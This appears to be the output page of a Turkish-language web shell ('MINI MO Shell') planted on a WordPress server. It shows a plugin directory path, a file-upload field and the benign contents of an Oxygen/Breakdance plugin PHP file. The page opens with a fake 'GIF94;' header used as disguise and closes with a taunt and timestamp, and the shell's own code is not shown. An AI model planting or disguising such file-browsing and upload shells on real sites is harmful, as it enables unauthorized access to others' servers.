GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/interactions/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/interactions/attributes.php

<?php

namespace Breakdance\Interactions;

add_filter('breakdance_element_attributes', '\Breakdance\Interactions\addAttributes', 100, 1);

/**
 * @param ElementAttribute[] $attributes
 * @return array
 */
function addAttributes($attributes)
{
    $attributes[] = [
        "name" => "data-interactions",
        "template" => "{{ settings.interactions.interactions ? settings.interactions.interactions|json_encode : '' }}",
    ];

    return $attributes;
}

OHA YOOO - Tarih: 2026-08-04 00:22:07